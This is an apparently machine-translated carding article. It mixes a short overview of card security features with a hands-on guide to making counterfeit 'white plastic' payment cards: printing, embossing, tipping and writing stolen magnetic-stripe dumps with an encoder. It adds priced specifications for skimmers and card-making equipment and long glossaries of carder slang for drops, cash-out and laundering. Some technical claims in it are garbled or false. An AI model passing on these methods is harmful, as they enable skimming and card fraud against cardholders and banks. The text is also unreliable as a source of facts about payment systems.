In recent years, various projects of devices for the contactless use of contact credits (for example, using Bluetooth) have begun to be promoted. Those. you insert the credit card into a small adapter and you no longer need to take out the card when paying. The adapter itself will exchange all the necessary data with the electronic terminal. Since all data is transmitted over the radio channel, there is no guarantee that no one will intercept it. Therefore, all traffic is encrypted (using keys that are transmitted only at the stage of card personalization). This, of course, looks rather unreliable, but what can you do - everyone wants convenience.
Shield and sword
Physical (sometimes also called printing) credit card protection consists of several parts. This includes, for example: a hologram, a signature strip, a photograph of the owner, hidden drawings / inscriptions, and a micro font. Let's dwell on this in more detail.
Hologram. A hologram is made from several connected layers of foil, often part of the text is also embossed on it, which complicates attempts to make a fake credit. For example, a dove is depicted on the hologram of Visa, which rotates its head and flaps its wings, on the MasterCard there is a colorful globe and a map of the world. For a long time, they could not accurately forge a hologram, now this is no longer a problem.
Signature strip. The signature strip is located on the reverse of the credit. The background of the strip is an asymmetric and / or complex pattern; it is made of an appropriate material that prevents the signature from being erased or washed off. It is necessary that the signature is fully consistent with the signature on the identity document of the owner. In some cases, the card number is still burned out on the strip with a laser.
Photo of the owner. Also located on the reverse. A photo is the easiest way to check if you are the owner.
Hidden drawings / inscriptions. Usually, hidden drawings invisible to the naked eye are applied to the card with special paints. Such patterns are visible either in ultraviolet light or through special filters.
Micro font. Micro font printing is another form of security. The text printed in micro-type is practically invisible to the naked eye - the height of each letter is about 1/5 mm. For example, on a Visa Electron card, micro-font text is located around the perimeter of the Visa and Electron logos.
Protecting credit cards gets more complicated as they spread. Manufacturers come up with all the new types of protection, and they are all gradually bypassed. With the large-scale introduction of a new type of cards, many difficulties arise, given how many millions of people now use credit cards (they all need to withdraw credit cards and issue new ones). Now the printing security is going through a certain crisis, the market for counterfeits is taking on a critical size, banks are suffering big losses from caring. The only hope remains the transition to smart cards with hardware-based cryptographic protection.
How we are faked
Despite such a serious protection, there are a lot of forgeries. Many fakes are made literally on the knee, and their quality leaves much to be desired, but there are also practically indistinguishable from the real ones. By the way, in terms of the number of counterfeits, Russia is a recognized leader.
The most widespread and the highest quality type of fakes is the so-called "white plastic". It is used like this: data about the cardholder is applied to virgin clean credits (blanks). Sometimes the numbers on the card are interrupted (cut / pasted) and this method, due to its popularity, even got the name shave & paste (cut and paste). It is clear that all such actions are criminally punishable (the term can be considerable).
As you can see, creda is not just a plastic plate. Credit cards are constantly being improved (now the credit resembles a miniature computer), manufacturers are joining forces to fight counterfeiting. How it all ends - we'll see, but credit cards were, are and will be.
In 1976, Americard changed its name to Visa (to enter the global arena), and in 1980 MasterCharge changed to MasterCard. For several years, these payment systems have become the largest in the world (in the banking environment) and are not going to give up their positions.
Today there are credit cards of only one standard - ID-1, others are simply (yet or already) not used. This standard defines everything up to a hundredth of a millimeter, each element of the credit must be exactly in its place and fully perform the function assigned to it.
During production, special attention is paid to safety at the stage of personalization of the card (application of the owner's identification data and firmware of the microcircuit memory (encoding)).
The protective mechanisms of the credits include: a hologram, a signature strip, a photograph of the owner, and a micro font.
DIY a credit card
Unlike children, credit cards are much more difficult to make. In addition to skills and experience, appropriate devices are also needed. Draw the basic principles of manufacturing from the article, and the rest is already in practice.
What you need to produce cards
It all starts with the source material, in fact, the backing of any card. For simplicity, it is popularly called plastic or cardboard. Buying plastic of the right size with a glued-in magnetic strip is not a problem now. It is worth buying white plastic, this will save on ink for the printer.
To make a full-fledged card out of purchased plastic, you will have to suffer with special equipment. It all starts, as you know, with the printing of images on the card. For small runs (up to 1000 pieces), the sublimation printing method is used.
To get a high-quality image that you are not ashamed to show to your girlfriend or fellow students, you will need a special printer for printing on plastic cards. When choosing a printer, you must carefully study its characteristics. Printers are divided into the following groups: monochrome and full-color, single-sided and double-sided (on double-sided, you can print both sides at once in one pass). Most printers have built-in or optional (with the ability to purchase the required unit) additional functions: laminator, encoder, embosser, tipper, as well as a device for pasting a hologram and signature strip.
The last function is more or less clear, I'll tell you about the rest. A laminator is required in order to cover the image with a special protective film after printing, this simple process is called lamination. The encoder will help you write the dump onto a magnetic card, the embosser will emboss the initials and the "secret" combination of numbers right on the card, and the tipper (not to be confused with the gonorrhea) will color the embossed symbols.
Technology step by step
To make a full-fledged card, you need to implement several simple operations:
- printing images on both sides of the card;
- lamination;
- embossing;
- tipping;
- insertion of a hologram and signature stripes;
- recording information on magnetic tape using a tipper.
Experienced tips
Everything is simple with the printer - the main thing is that its resolution is at least 300dpi, it can print without borders and does not burp cards with a thickness of 0.75 millimeters. If the printer does not match at least one of the listed parameters, forget about its existence.
It does not hurt to inquire about the cost of consumables, as later this can result in a funny amount. In addition to the cost, it is also necessary to inquire about the availability of these materials, so as not to fly later to Africa for them. It is clear that noname is always cheaper, but I still advise you to purchase equipment from well-known companies. The leaders in dye-sublimation and thermal transfer printers are Eltron and Fargo. To buy only original (read - native) consumables or not is a matter of taste, but with relatives the quality is guaranteed.
With embossers, it's generally elementary. Here, the resulting quality is almost the same for all models, the price depends only on the performance and brand. The simplest is a manual embosser, does not require power supply and is easy to use.
When buying a tipper, just like in the case of a printer, check the cost and availability of foil for this particular model. And a separate laminator is not needed at all, it is easier to buy a printer or embosser with a built-in laminator. Separately, the laminator will cost more, and it will take more time to make one card.
Encoders can record two types of maps - high and low coercivity. Essentially, it is high and low magnetization. It makes sense to buy an encoder that understands any cards. And a separate note about the tracks - don't chase the encoder, which records all three tracks (the magnetic stripe has three areas called tracks). The third track is not read by almost any POS terminal and even more so by ATMs. So is it worth overpaying for useless bells and whistles? Such an encoder may be needed only for issuing credit cards that give owners certain discounts.
TA-32 (skimmer)
- Price: 1200 green
- Memory: 512 KB (about 3000 dumps)
- Tracks: reads 1, 2, 3
- Power supply: built-in lithium battery, 50 hours of continuous operation
- Connection: USB
- Dimensions: 8.25x2.03x2.67 cm
- All: 49 grams
Characteristics
Description: this reader has good performance, it allows on-the-fly reading of cards of any thickness and with any recording density. Allows reading in both directions and at any speed. Heat resistant, works at temperatures from 0 to 60 degrees. The set includes software. The body is made of super strong ABS plastic, especially for those with shaking hands.
PMR-202 (skimmer)
- Price: 1190 green
- Memory: 128 KB (about 1000 dumps)
- Tracks: reads 1, 2
- Power supply: built-in lithium battery, 50 hours of continuous operation
- Connection: USB
- Dimensions: 4.6 x 3 x 3.08 cm
- Weight: 54 grams
Characteristics
Description: from the chips of this skimmer, one can note the automatic power off during a long idle time, protection from unwanted users (password protection from unauthorized access). The set includes software for working with the skimmer.
AMC-772 (encoder)
- Price: 1000 green
- Tracks: writes and reads 1, 2
- Connection: USB
- Weight: 1.33kg
Characteristics
Description: one of the most reliable and therefore popular encoders. Connects to USB, which is relevant lately. The viability of the magnetic head is about a million wires, that's enough for you and there will still be children. The set includes standard software.
Matica Z1 (embosser)
- Price: 4700 green
- Dimensions: 43x40x17 cm
- Weight: 17KG
Characteristics
Description: the perfect solution, time-tested. Compactness, nice design, small size and quiet operation. The Z1 features automatic card loading (at the exit, finished cards are placed in the output tray for maximum space saving), an internal diagnostic system and an LCD display for continuous monitoring of operation. Recommended productivity: 300-500 cards per day. Windows compatible, USB connection.
Matica Z Tipper
- Price: 1990 green
- Dimensions: 25x25x20 cm
- Weight: 3KG
Characteristics
Description: Matica Z tipper is a single device for coloring embossed cards (more precisely, the embossed symbols on them). Extremely compact size allows you to install the device in any place. It is very easy to use, the required temperature and pressure are set to obtain the ideal result. The liquid crystal display this tipper is equipped with shows the current state of the machine and the temperature. In addition, the energy saving function results in lower energy consumption when the machine is idle in standby mode. The dyeing tape can be of different colors. Installing and replacing the cartridge for loading the tape is easy. Coloring speed is only a few seconds per card!
Eltron P210i (printer)
- Price: 2195 green
- Dimensions: 12.5x17x24cm
- All: 3 kg
Characteristics
Description: The Eltron P210i can be used to print IDs, preprinted cards in color or monochrome. Suitable for borderless one-sided printing. Stamps excellent quality cards with a resolution of 300 dpi, allows you to apply barcodes, photos, graphics or text. Quiet in operation, small and lightweight. There is a modification with a magnetic stripe encoder. The P210i comes with a dual interface for easy integration into any system: USB and Parallel, or USB and Serial.
Carder's Dictionary!
Authorization - checking and determining the authority to perform certain actions. Permission granted by the issuer to conduct a transaction using a bank card. During the authorization process, data about the card and the requested amount are transferred to the issuing bank, where the status of the client's account is checked.
Acc - account.
American Express (AmEx) is an international payment system, the card number starts with 34 or 37 and consists of 15 digits.
ATM - a tamper-resistant bank security device designed for: issuing and accepting cash; preparation of documents for transactions using bank cards; issuing account information; making non-cash payments, etc. The ATM is equipped with a processor, display, keyboard and reader designed to read information from the card.
BIN - the first 6 digits of the bank card number, which determine the bank that issued the card and its type (classic, gold, etc.).
Card number - card number - a unique set of numbers applied to the card as a result of embossing, as well as stored in memory on a magnetic stripe or in a microcircuit.
Card owner - the cardholder is the organization that issued the bank card.
CVV (Card verification value) - a verification value for the card number, located in the dump.
CVV2 - additional security code, located on the back of the vehicle, usually consists of 3 digits.
DL (driver license) - driver's license (English).
Expiration date (exp. Date) - the expiration date of the card, it is on the card itself and in the dump.
VISA is an international payment system, card numbers start with 4. Site.
Western Union is an international money transfer system.
Wire transfer - bank transfer.
Gold credit card - a gold credit card is a prestigious payment card that provides the holder with priority status, a high credit limit, automatic insurance and other privileges.
Debit card - a card that can only be used up to the amount available on the account.
Drop is a person who takes on (consciously or unconsciously) the dirty part of the job. Accepts money transfers, provides an account for transactions by other people, etc.
Carder is a person who uses information from someone else's bank card to receive money.
Carding - getting money by using information from someone else's bank card.
Cardholder - a holder of a bank card, an individual or a legal entity.
Ripper - a person who threw one of the carders.
Credit card - a card that can be used to buy on credit, i.e. not having enough money on the account. The amount of the loan is determined by the issuing bank.
MasterCard is an international payment system, card numbers start with 5.
MoneyGram is a fast money transfer system.
Soap - E-mail, e-mail address.
Cash out - converting virtual money into real money.
PAN - bank card number, most often 16-digit.
Payment system - an association of banks and companies working according to the general rules for the use of cards. The basis of the payment system is a set of regulatory, contractual, financial and information and technical means, as well as decisions of participants that regulate their relationships regarding the procedure for using cards. There are several membership statuses in the payment system: full, partial, etc. All cards that belong to one payment system have signs that allow identifying their belonging to this payment system.
Prepaid card - a card with a prepaid amount - a smart card that stores electronic money prepaid by the cardholder.
Scan - a scanned document, photo, bank card, etc.
Transaction is a banking operation consisting in the transfer of funds from one account to another.
Real carding
Issuing bank - the bank that issued the bank card.
Corporate card - corporate card - a bank card that allows its holder to carry out transactions on the account of a legal entity. A legal entity bears responsibility to the bank for this account.
Valid date - the date of validity - the number imprinted on the bank card, from which the card becomes valid.
A hologram is a holographic sticker applied by pressing into a card under high temperature. The hologram serves as an additional degree of protection against crafts and is a mandatory attribute of bank cards.
Dump - information from the magnetic stripe of a bank card. It is used to record on a plastic of a certain standard for later use in the store. see more: here.
Electronic Purse is a smart card that stores digital cash. This card allows you to spend electronic cash, creates a record of each payment and allows you to transfer money from a bank account to digital cash.
Laminator - a device for covering bank cards with a protective film. see more: here
PIN-cod is a code used for authorization, with which you can carry out operations with a bank card, for example: withdraw cash.
Plastic - most often real or fake plastic bank cards, as well as any plastic on which a dump can be written. see more: here, or: here.
Plastic card - a plate of standard dimensions 85.6 x 53.9 x 0.76 mm, made of plastic resistant to mechanical and thermal influences, is an information carrier.
POS terminal is an electronic device that allows reading information from a magnetic stripe or a card chip and communicating with the bank for authorization in order to carry out transactions with a bank card.
Real carding is the use of information from someone else's bank card in real stores. As a rule, dumps recorded on plastic are used for this.
Reader - a device for reading a magnetic strip of a bank card. see more: here.
Smart card - a bank card with a chip, a credit card with a built-in microprocessor, which has a high level of security and the ability to carry out multi-currency payments. see more: here
Slip is a check issued by a POS terminal.
Shopping - shopping trip.
Tipper is a device for staining embossed symbols. see more: here.
Transaction is a set of operations of interaction between the cardholder and the processing center when making a payment with a card or when receiving cash.
The transaction changes the state of the cardholder's card account.
Track - one of the tracks on the magnetic stripe of a bank card in the form of a text file, there are 3 of them in total.
An embosser is a device for embossing symbols (for example, card numbers) on plastic. see more: here
An encoder is a device for writing and reading magnetic stripe cards (plastic). see more: here
Internet carding
Adult - porn site
BidPay is a payment system that allows a person who bought something at an auction to pay for their purchase. This is a payment system that allows you to make MO without any problems using a card.
Billing is a payment system.
eBay - the name of the online auction eBay.
Internet carding is the use of data from someone else's bank card to carry out all kinds of transactions on the Internet in order to receive money.
Card (cardboard, potatoes, CC, SS) - bank card number. ?? is used for online shopping. Happens with and without cvv2 code.
Merchant - a trading account to which money is received for the goods sold, an online trading system.
Stick - PayPal money transfer system.
Pornic is a porn site.
A proxy is a server function that allows a user to work on his behalf.
SalesCart is an e-commerce package integrated with Microsoft FrontPage to enable online shopping.
Socks (Sоcks-proxy) - an intermediary server between your computer and the final site, used to hide the IP.
Spam is a large-scale distribution of letters by e-mail.
SSN (social security number) is a number that is given to every resident of the United States for easier taxation and tracking of credit history.
Chargeback is a withdrawal by a bank (cardholder) of a payment in respect of which there are doubts.
Enroll is a connection of a credit card (account) with an on-line with the ability to find out and change data via the Internet.
IP - Internet address, consists of four numbers separated by a period, each of which can be from 0 to 255. Identifies the user's location.
WebMoney is an Internet payment system.
Common abbreviations
Amex - American Express.
CC - Credit Card.
CC number - Credit card number (cc - abbreviation: credit card)
CVV - Card Verification Value. - a specific number to verify the authenticity of the card. With the advent of electronic terminals, scammers have focused on falsifying or altering information stored on the magnetic stripe. To combat such violations, VISA specialists have developed CVV
Dl - driver license.
Exp. date - Expiration date.
MG - Money Gramm.
MO - Money Order.
SSN - Social security number.
WM - WebMoney.
WU - Western Union.
ABA Routing Number is a unique nine-digit number, usually placed at the bottom of the check before the account number (surrounded by colons). Allows you to unambiguously determine the bank where the amount for which the check is drawn is located.
Acquirer (Acquiring Bank) is a bank or financial organization that carries out the whole range of operations to interact with bank card service points, which consists of terminals in the trade and service network and ATMs. Upon receipt of data on operations performed in the network, the acquirer sends them to the system for making appropriate calculations. The acquirer is responsible for refunds to merchants where purchases were made or services were paid for using cards.
Address Verification Service (AVS) - the operation of verifying the address where the invoice for the purchased item is received.
Approval - confirmation, a code sent by the issuing bank to confirm that the buyer's plastic card exists, is usable and the requested amount is within the allowed limit. Confirmation is requested during the authorization operation.
Automated Teller Machine (ATM) is a device designed to receive cash using a plastic / smart card.
Authorization - authorization, payment request. The authorization process blocks the money in the account, reducing the amount free for spending. To make a withdrawal, you must complete the authorization process. If the authorization process is not completed within the time determined by the issuer, it is canceled and the previously blocked amount is released for spending.
Authorization Code - authorization code. A code, consisting of letters and numbers, sent by the issuing bank (Card Issuer), confirming the authorization. The authorization code must be included in the Sales Draft issued by the seller.
Bank Identification Number (BIN) - numbers on a plastic card that uniquely identify the Issuing Bank. This is usually the first six digits and is often referred to as a bin.
Batch is a set of transactions saved for simultaneous payment, which usually happens once a day. Batch can be completed both automatically and using a POS terminal.
Batch Processing is a type of data processing in which a certain set of transactions is processed at a time.
Billing Address is actually the address to which the invoice for the purchased goods is received.
Capture is a decision to present a specific transaction for payment. All transactions submitted for payment are included in the Batch and sent to the payment processor or payment gateway.
Card Issuer is an organization responsible for issuing and servicing plastic cards.
Card-Not-Present - a situation when the seller is unable to see the buyer, and the plastic card is physically inaccessible to him, that is, he is unable to read information from the magnetic strip, check the signature, view the hologram, etc. To improve the reliability of payment in this case, the Address Verification Service system is used.
Card Unblocking is the opposite of Card Blocking.
Certification Authority is an organization that is trusted to issue public key certificates.
Chargeback - payment return operation. The amount that is deducted from the merchant's account at the request of the owner of the plastic card. If the correctness of the cardholder is recognized, the payment amount plus the charge for ChargeBack (Chargeback Fee) is deducted from the merchant's account. The ChargeBack operation is initiated by the issuer after the acquirer has completed the transaction.
Chargeback Reason Code is a two-digit number that encodes the reason for the return of the payment.
Check Guarantee is a method that guarantees payment of a check within the amount set for a specific account.
Chip Сard - smart card (also IC - integrated circuit card). A plastic card containing a microprocessor capable of storing "electronic money".
Сlose Batch - transfer of transactions with authorization codes to the payment processor in order to transfer money to the merchant's account.
Commerce Server is an Internet server connected to a payment processor, which has everything you need to accept them: software that stores information about all purchases and the total price, a database, etc. Commerce Server usually allows you to establish a connection over one of the secure protocols, such as SSL.
Confirmation Letter is an e-mail sent to the merchant by the payment processor containing information about the Batch files submitted to the processor.
Credit Card is a plastic card showing that a credit has been opened for its owner in the issuing organization. This allows the owner to make purchases or receive money from the ATM within the maximum limit established by the agreement between the holder and the issuer.
Credit Card Processors (Third Party Processors) - An organization usually hired by an acquiring bank to provide payment processing services.
CVV2 / CVC2 is a three-digit control number printed on the back of a bank card. This number is displayed in the upper right corner of the special signature field. Entering the number helps to ensure that the card is used by the real owner. CVV2 classification is used for VISA cards. CVC2 classification is used for MasterCard cards.
Debit Card is a debit bank card. Unlike a credit card, the amount spent by the buyer is automatically deducted from his account. Debit card payments usually require a PIN
Decline - the operation of the issuer's refusal to authorize the payment.
Demand Deposit Account (DDA) - a standard account (checking account) where funds can be transferred.
Deposit - the moment when the seller forms (closes) the Batch file and sends transactions to complete.
Deposit Bank is the bank where the seller's money, withdrawn from the buyers' card accounts, is sent.
Digital Signature - digital signature. A sequence of characters, obtained by means of asymmetric cryptography (Public Key Cryptography), attached to the message and confirming its authenticity.
Digital Wallet is a digital wallet. A program for paying for goods by credit card. Before buying something, the customer registers with the payment gateway, receives a username and password, and then can make a purchase on any website that supports this type of digital wallet.
Discount Rate - the percentage charged by the acquiring bank from the seller for each purchase.
E-Commerce - e-commerce, a certain type of activity carried out using electronic means of communication.
Electronic Data Interchange (EDI) is a global computer network, separated from the Internet, used by banks and other financial institutions to process payments.
Electronic Data Capture - using a POS terminal to authorize and transfer transactions to a bank card processor or other MAP. The role of a POS terminal can be played by special software or a Payment Gateway.
Electronic Cash Register (ECR) is an electronic cash register, in other words, a combination of a cash register and a POS terminal. ECR is often a software application installed on a personal computer.
Electronic Draft Capture (EDC) is a system in which transactions are transferred from different locations to a central computer (Host Computer) for storage and processing. The accumulated transactions over the period are then passed on to the payment processor.
Electronic Money (e-money) - digital cash. Stored electronically in computers or microprocessors. At the disposal of the buyer. Digital cash can be purchased and stored in a special storage device.
Electronic Purse is a smart card that stores digital cash (e-money).
EMV-specification - uniform international requirements for microprocessor cards, describing the requirements for the card, terminal and the process of information exchange between the card and the terminal.
Factoring - a situation when the merchant / service enterprise's own identification number in the payment system (Merchant Account) is used to receive payments for an additional commission for the needs of another merchant. This activity is considered illegal.
Floor Limit - if the price of the product is below the Floor Limit, the seller can do without authorization (making sure that the card is not listed as lost or stolen). The Floor Limit is usually set by the issuer.
Front-End - information that the buyer sees on the seller's website. Front-End allows the shopper to interact with the e-cart, database, and pay for purchases.
Holdback (Reserve Account) - part of the funds received by the merchant from card payments, blocked by the acquirer or another MAP to cover the cost of chargeback and other controversial payments. After a certain period of time, the Holdback is returned to the seller.
Host Capture - automatic creation of a Batch file in a payment processor or payment gateway.
Host Computer - the computer that performs authorization and termination.
Imprint - reading card parameters. It can be electronic (via a POS terminal) or manual (obtaining an imprint of a card using an imprinter). Imprint is required to prove the physical presence of the card at the place of purchase.
Interchange - the flow of information between the issuer and the acquirer, for example, transactions, returns, etc.
Interchange Fee - the commission that the acquiring bank pays to the issuing bank for each transfer operation from a bank card. This commission is part of Discount Fee.
ISO (Independent Service Organization) is an organization that helps merchants accept payments by plastic cards. Merchants should usually already have an open Merchant Account before working with ISO.
Issuer (Issuing Bank) is an issuer, a bank that issues bank cards and opens card accounts for individuals and legal entities.
Key - a key, a set of numbers used in a cryptographic algorithm.
Key length - the length of the key (Key), measured in bits.
Limited-purpose prepaid card is a smart card that can be used only at strictly defined points of sale of goods or services.
Load - an operation to load digital cash into a digital wallet.
Load Log - a record of the last load of digital cash into a digital wallet.
Local Review - the merchant's ability to see the contents of the Batch file from their terminal or ECR before or after the completion of the transaction.
Locking (Card Blocking) - blocking a smart card, preventing its further use.
Magnetic Stripe - magnetic stripe. It is located on the back of a plastic card and contains, in an encoded form, information about the card account associated with this card.
Manual Entry (Keyed Entry) - operation of manual input of card parameters from a computer keyboard or POS-terminal.
Member - a financial institution - a member of the international payment system association.
Merchant is a legal entity that accepts payments by plastic cards.
Merchant Account is a unique identification number of a merchant / service enterprise in the payment system, which allows you to accept payments by bank cards. By registering a Marchant Account, the bank agrees to pay the merchant / service provider for the correct transactions (purchases) in exchange for withdrawing funds from the buyers' accounts with the issuing banks.
Merchant Account Provider (MAP) - the organization that opens the Merchant Account.
Merchant Agreement is a written agreement between the merchant and the bank (possibly between the merchant, the bank and ISO), which establishes the rights, obligations and guarantees of the parties in the process of accepting card payments.
Merchant Bank - the bank where the Merchant Account is opened.
Merchant Category Code - the code that the acquiring bank assigns to the merchant. This code, usually consisting of four digits and sometimes called the Sic Code, reflects the main activity of the seller.
Micropayment is a micropayment, a very small amount, perhaps less than a cent.
MID (Merchant Identification Number) is a number that uniquely identifies the merchant in the payment system.
Monthly Minimum - the minimum monthly fee that is deducted from the seller for accepting payments by plastic cards.
MOTO Discount Rate (Mail Order / Telephone Order) is a commission charged by the acquirer from each transaction in the event that the merchant does not have access to the card itself, knowing only its parameters communicated to him by phone, fax or the Internet.
Non-Qualified - designation of a transaction characterized by an increased risk (for example, in the case when a transaction is carried out using the transfer of bank card parameters when it is physically impossible to access it).
Off-line - designation of the state of the system, when there is no direct connection between the participants of the payment system.
On-line - designation of the state of the system when, before the transaction is completed, there is a connection to the central computer for authorization in real time.
Open To Buy - the amount of credit currently available to the card account holder.
Payment Gateway - payment gateway. Typically an Internet server with software installed on it that connects the merchant's web server to the payment processor.
Payment System - payment system. A set of banking procedures and interbank money transfer systems.
Pc Pos Application is a computer software application that combines any two functions from the list: cash register, value accounting, accounting software, software for authorizing and accepting payments by credit cards.
PIN (Personal Identification Number) is a digital or alphanumeric code available only to the cardholder. It is used for operations with a card account linked to a given bank card.
POS Terminal (Point of Sale) is an electronic device used to authorize and process payments with a bank card.
Post Authorization is a transaction preceded by voice authorization.
Prepaid card is a smart card that stores electronic money prepaid by the cardholder.
Prior Authorized Sale - a transaction for which authorization is performed first. The merchant will authorize the card before providing the product / service.
Private Key is a private key that only its owner should have access to. The public key corresponds to the private key.
Processor - a payment processor, a computer center that processes bank card payments
Public Key - a public key, unclassified part of a pair of two keys in asymmetric cryptography.
Public Key Certificate - a public key certificate. Public key information, usually including the key itself, digitally signed by an individual or organization. A certificate protects the integrity of a key if the person or organization that signed it is well known and their public keys are widely available.
Public Key Cryptography is an encryption scheme that does not require a confidential channel to establish confidential communications. To send a confidential message, only the recipient's public key is needed, which will decrypt the received message with his secret key.
Public Key Encryption is an encryption method designed to overcome the main disadvantage of symmetric cryptography - the need to have a reliable channel to transmit the key to the addressee.
Real-Time Processing - the process of processing payments in real time, when the verification and processing of the card payment immediately follows the purchase. Real-time verification usually takes several tens of seconds.
Receipt - a check containing a description of a purchase by a bank card, usually includes the following information: date, name and address of the seller, amount, unique number and authorization code.
Recurring Fees are regular, usually monthly payments for using a Merchant Account. Includes Discount Rate, Transaction Fee, Statement Fee, and Monthly Minimum.
Recurring Transaction - a periodic withdrawal of money from the buyer's account, which occurs on the basis of an agreement concluded between the buyer and the trade / service company.
Retrieval Request (Copy Request) - a requirement for the seller to submit documentation about a specific transaction. Usually comes from the issuing bank in controversial cases where the cardholder disputes the transaction.
Secure Server - a secure server that allows you to establish a secure connection with the browser using the SSL or SET protocol
Session Key is a key for symmetric encryption that is used for a limited time, more often for one secure connection, for example, over the SSL protocol.
SET (Secure Electronic Transaction) is a system for ensuring the security of payment by bank cards, developed by VISA, MasterCard, Microsoft and several leading banks, based on public key encryption of information associated with card parameters and the separation of information between transaction participants in such a way that none of the participants in the settlement possesses the information in full. With the SET standard, a buyer and a seller can uniquely identify each other by exchanging digital SET certificates.
Settlement (Draft Capture) - the process of payment completion, when transactions are sent along with authorization codes to the payment processor to transfer funds to the merchant.
Setup Fee - a one-time fee charged for opening a merchant / service company identification number in a payment system (Merchant Account)
Shopping Cart Program is an electronic cart. An application launched on the Internet site, designed to collect data about a product / service that a visitor intends to purchase.
SIC Code - Standard Industry Classification code. This is a four-digit number that identifies the type of activity.
Smart Card is a plastic card that contains a microprocessor capable of performing calculations. Smart-card is designed for payment and identification operations.
SSL (Secure Socket Layer) is a secure communication protocol over the Internet. The basis of the SSL protocol is a two-key cryptography method, which uses public key certificates of users (client and server) to authenticate the interacting parties and generate a common encryption key, digitally signed by special certification authorities. Thanks to servers that support the SSL protocol, the user who loads the site can be sure in three main points:
The site really belongs to the company that installed the SSL certificate.
Using a unique "session key", SSL encrypts all information exchanged between the Internet site and its users. This ensures, at a minimum, that the data transmitted to the server will not be viewed or intercepted by third parties.
SSL data cannot be partially lost or replaced.
One of the indicators of secure communication is the address bar of the browser, in which, during a secure connection, the address will begin with https:// instead of the usual one from which the addresses of the pages that are not protected by the SSL protocol begin.
Statement Fee - fixed recurring fee for using the Merchant Account.
Surcharges - additional charge for accepting bank card payments.
Swipe Discount Rate - the percentage charged by the acquirer from the merchant for each withdrawal of funds from a bank card physically available to the merchant.
Swiped Card is a card, information from which is automatically entered using a POS terminal.
Symmetric Cryptography - Symmetric or private key cryptography. A cryptographic algorithm that uses the same key to encode and decode.
Terminal Capture is a type of accepting card payments, when information about transactions is stored on the merchant's computer, and the latter manually forms a Batch from them and then sends it for payment.
Third Party Processor is a company not owned by the payment association VISA or MasterCard, hired by the acquirer to carry out authorizations and payments with plastic cards.
Ticket Only - a purchase for which voice authorization is used.
Transaction is any interaction between a buyer and a seller that affects the state of the buyer's card account.
Transaction Fee is a fixed fee charged to the seller for each purchase (usually in addition to the Discount Rate).
Transaction File (Vendor File) - a file in which the payment processor places all transactions made for the previous day.
Transaction Log - transactions recorded in the order they were committed.
Voice Authorization - voice authorization. It is used when there is no suitable device for authorization, for example, a POS terminal.
Void - the buyer's refusal to pay after the authorization of the card belonging to him has been successfully completed. Transactions marked as Void are not included in Batch and will not be charged for further payment.
Carders (from the English "card" - card) - professional criminals specializing in illegal activities in the field of circulation of plastic cards and their electronic details.
DICTIONARY OF JARGON WORDS AND CARDEN EXPRESSIONS
BIN (from "bank identification number" - English "bank identification number (BIN)") - a number consisting of 4 digits and intended to identify banks - issuers of payment and settlement cards in the payment system. As a rule, the first four digits in the bank card number coincide with the BIN of its issuer.
VALID CARD (from the English "VALID" - "valid") - valid or valid card; genuine card; identification details of a valid or genuine card.
VALIDITY (from the English "VALID THRU" - "valid until ...") - card expiration date.
WEBMANI (web money, WM) - payment system of the "Internet" (used for criminal settlements when buying and selling information about the details of other people's cards, the provision of consulting carder services, etc.); money received from illegal activities on the Internet.
VNEDRENETS - a member of an organized criminal group from among the employees of a merchant, acquirer or issuer.
GENERATOR is a malicious computer program that generates digital identification details (conventional and electronic) of plastic cards (as a rule, an identification pair).
IRON - computer hardware; electronic terminal without software; equipment for counterfeiting plastic cards (personalizer, printer, embosser, laminator, etc.).
INFA (info) - information, information about something.
CARDING (carding) - illegal activity in the sphere of circulation of plastic cards and their numbers; performing any specific actions on someone else's plastic cards or their numbers.
CARDS (cardz) - payment and settlement cards.
CODE-GRABBER is a malicious computer program that picks up a secret key, password or access code to the software of an electronic terminal or a database of a merchant, acquirer, issuer to carry out an operation using a plastic card or steal confidential data.
CODER (coder) - a technical device for recording computer data (electronic details) on a magnetic stripe card.
CODING (coding) - recording computer data (electronic details) on the magnetic stripe of the card.
CODES (codes, codez) - access codes to confidential information of the database of a virtual store, acquiring bank or issuer, or to a protected object; Pin; an algorithm for "hacking" protection against unauthorized access to computer information or to a protected object.
CORDER - A criminal who specializes in counterfeiting magnetic stripe cards.
CREDA - credit or other bank card or information about it.
CRYPT (cript) - cryptographic data transformation algorithm; a program for generating identification pairs and other digital identification details of bank cards.
KRYAK - "hacking" means of protection against unauthorized access to confidential computer information contained on a plastic card or client database of a virtual store, acquirer bank or issuer.
LAMER (LAMER, LAM3R) - a card holder or a client of a virtual store - a potential victim; novice carder.
DEAD CARD - a card of no value; a card that, for any reason, cannot be used to carry out transactions (wanted, blocked, transactions on which are monitored by law enforcement agencies, etc.); a card that cannot be faked.
CREDIT NUMBER - any identification number of the card; identification pair of the card; electronic card details.
ORDER - order goods in a virtual store using bank card details.
CLEAN CARD - transfer money from a card - from a special card account to another account, using a whole chain of intermediate accounts and payment systems; hide ("sweep") the traces of the stolen money.
PATCH, PACH (from the English "patch" - patch, patch) - a change in the electronic property of the card or computer program.
PATCH, PATCH - make changes to the electronic details of the card or computer program or.
CHANGE - change, reprogram the computer data (electronic details) contained on the integrated microcircuit of the card.
PIN (from the English "personal identification number" (PIN) - "personal identification number") - PIN-code or PIN-code: a secret key of electronic digital signature, issued to the user (cardholder, subscriber) of a computer network or telecommunications for his identification and providing access to computer information.
PLASTIC (plastic), TILES - a really existing plastic card.
VALIDITY CHECK - checking the correctness of the selection of the number, identification pair, PIN-code or electronic card details; checking whether the merchant accepts the card for the payment and settlement operation or not.
PROXY-SERVER (from the English "proxy-server" - "a server that provides authorization") - a control computer of a computer network (server), which automatically authorizes users (cardholders or subscribers) using a secret key (PIN-code or password) and gives permission to access and work with computer information.
FIRMWARE, FIRMWARE - software (a set of computer programs) stored in the memory of an integrated microcircuit.
FLASH - write any data into the memory of the integrated microcircuit; the same as "alter".
REANIMATOR (reanimator) - a criminal who specializes in counterfeiting ("recharging") cards with a fixed purchasing power.
CVC2 / CVV2 - the last three digits of the bank card number, which are calculated using the DES cryptographic data conversion algorithm using the secret key of the issuing bank and establish the mathematical dependence of the card number on its validity period.
SIMA, SIMKA - SIM card.
DRAIN FROM THE CARD - withdraw money from the card - from a special card account or transfer it to another (as a rule, your own) bank account; commit the theft of money using someone else's plastic card or its details.
TRADING - trade, exchange of stolen confidential information about the details of plastic cards and their holders. For example, "I give you a spam list for 3 million users, and you give me 10 valid credits with cvv2."
FAKE STORE is a virtual pseudoshop designed for fraudulent transactions with bank card details and personal data of their holders (like "fly-by-night companies").
